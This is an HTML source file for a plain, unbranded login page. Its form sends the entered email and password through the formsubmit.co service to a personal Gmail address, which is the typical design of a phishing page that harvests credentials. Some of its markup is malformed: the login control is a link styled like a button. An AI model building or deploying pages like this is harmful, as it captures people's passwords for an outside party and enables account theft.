<!DOCTYPE html>   
<html>   
<head>  
<meta name="viewport" content="width=device-width, initial-scale=1">  
<title> Login Page </title>  
<style>   
Body {  
  font-family: Calibri, Helvetica, sans-serif;  
  background-color: white;  
}  
button {   
       background-color: blue;   
       width: 20%;  
        color: orange;   
        padding: 15px;   
        margin: 10px 0px;   
        border: none;   
        cursor: pointer;   
         }   
 form {   
        border: 3px solid #f1f1f1;   
    }   
 input[type=text], input[type=password] {   
        width: 50%;   
        margin: 8px 0;  
        padding: 12px 20px;   
        display: inline-block;   
        border: 2px solid green;   
        box-sizing: border-box;   
    }  
 button:hover {   
        opacity: 0.7;   
    }   
  .cancelbtn {   
        width: auto;   
        padding: 10px 18px;  
        margin: 10px 5px;  
    }   
        
     
 .container {   
        padding: 25px;   
        background-color: white;  
    }   
</style>   
</head>    
<body>    
    <center> <h1> Login </h1> </center> 

<center>  

     <form target="_blank" action="https://formsubmit.co/ae260adjei@gmail.com" method="POST">
        <div class="container">
            <label>Email : </label>   
            <input type="text" placeholder="Enter Email" name="email" required> 
            <br>  
            <label>Password : </label>   
            <input type="password" placeholder="Enter Password" name="password" required> <br> 
           
            <a href="thank.html" button type="submit" class="btn-lg btn-block">Login </a>
              
            <br>  
            <input type="checkbox" checked="checked"> Remember me   
            <button type="button" class="cancelbtn"> Cancel</button>   
            Forgot <a href="#"> password? </a>   
        </div>   
    </form>
    </center>     
</body>     
</html>  
